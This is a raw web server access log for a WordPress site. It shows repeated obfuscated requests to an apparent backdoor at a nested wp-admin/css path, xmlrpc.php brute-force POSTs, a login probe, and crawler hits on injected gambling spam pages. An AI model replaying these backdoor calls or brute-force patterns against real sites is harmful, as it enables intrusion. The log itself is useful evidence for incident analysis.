34.231.118.144 - - [15/Oct/2025:10:42:07 -0400] "GET /robots.txt HTTP/1.0" 200 4348 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.213.85.234 - - [15/Oct/2025:10:42:07 -0400] "GET /2025/10/03/best-strategies-for-togel-players/ HTTP/1.0" 200 9014 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [15/Oct/2025:10:41:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323838302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393238302q3134653165383562653736626234653035343137666166353032376330303231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:41:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323930302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393330302q6632306133396531616366653034616466663630383534313739366365383766222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:42:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323932302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393332302q6330666334393463663032353266326263343931373732353830386137646666222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [15/Oct/2025:10:43:08 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentyfour/parts HTTP/1.0" 200 7194 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentyfour" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:42:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323934302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393334302q6261633436623362376235623939613766623538663535326463396461343364222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:42:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323936302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393336302q3138633131373763303137326564623332303764656130653661386531383632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.70 - - [15/Oct/2025:10:43:56 -0400] "GET /?_g=804193 HTTP/1.0" 200 24764 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:43:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534323938302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393338302q3466373632666135313563653636313866353864626362653936333865376662222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:43:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333030302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393430302q3965666530333036626165613363363934653433306563623764393462626130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [15/Oct/2025:10:44:31 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/images HTTP/1.0" 200 8144 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:43:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333032302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393432302q3661373233303431623765353430393535316163613433303935366461323534222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:44:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333034302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393434302q3335326332333935633136633639373464343536393865323563326134656463222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.72 - - [15/Oct/2025:10:45:01 -0400] "GET /?_g=1357792 HTTP/1.0" 200 24810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.71 - - [15/Oct/2025:10:45:07 -0400] "GET /?_g=2287494 HTTP/1.0" 200 24799 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:44:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333036302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393436302q3664356263346531336130643637616630306366356165323238373162643234222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:44:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333038302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393438302q3536336461326634316134303131306132326562663562636632653363666565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [15/Oct/2025:10:45:55 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/maintenance HTTP/1.0" 200 7109 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:45:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333130302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393530302q3631336639333531636439333333613533313537643038316439363834353433222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
67.205.0.157 - - [15/Oct/2025:10:46:02 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
67.205.0.157 - - [15/Oct/2025:10:46:03 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
67.205.0.157 - - [15/Oct/2025:10:46:04 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
67.205.0.157 - - [15/Oct/2025:10:46:05 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
67.205.0.157 - - [15/Oct/2025:10:46:06 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
67.205.0.157 - - [15/Oct/2025:10:46:08 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
107.189.5.4 - - [15/Oct/2025:10:46:09 -0400] "GET /wp-login.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
142.4.205.1 - - [15/Oct/2025:10:45:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333132302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393532302q6334613538613339336535336135653166353962343664323439666364633763222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:45:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333134302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393534302q3063643062393836323237396536376436333232356434613163393233636333222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.72 - - [15/Oct/2025:10:46:42 -0400] "GET /?_g=1976033 HTTP/1.0" 200 24158 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:10:46:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333136302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393536302q3032343137653939313634313935376534373239636136393732613531353738222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
43.153.204.189 - - [15/Oct/2025:10:47:04 -0400] "GET / HTTP/1.0" 200 9014 "http://academiedumarketing.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
142.4.205.1 - - [15/Oct/2025:10:46:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333138302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393538302q6265666437616366323863363831373338336265393163333238306463663039222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.66.70 - - [15/Oct/2025:10:47:20 -0400] "GET /?_g=732015 HTTP/1.0" 200 25368 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.131.235 - - [15/Oct/2025:10:47:24 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/block-bindings HTTP/1.0" 200 7097 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:46:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333230302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393630302q3564376631366534303134393735366630386336356266653061393237623461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:47:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333232302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393632302q3931343962376636626439313131396665303461323433343765653939633465222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:47:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333234302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393634302q3966633836323964656234396363396437386338333163626538323534333830222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:47:40 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333236302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393636302q6531343936623936323433316261633133353564666431393665343830353663222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [15/Oct/2025:10:48:46 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages/themes HTTP/1.0" 200 7877 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/languages" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:10:48:00 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333238302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393638302q6635393064636639323232343265326531643832626166373433316335633438222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:10:48:20 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303534333330302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303533393730302q3535383661636431393939373365313963386635343663303336303933646334222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
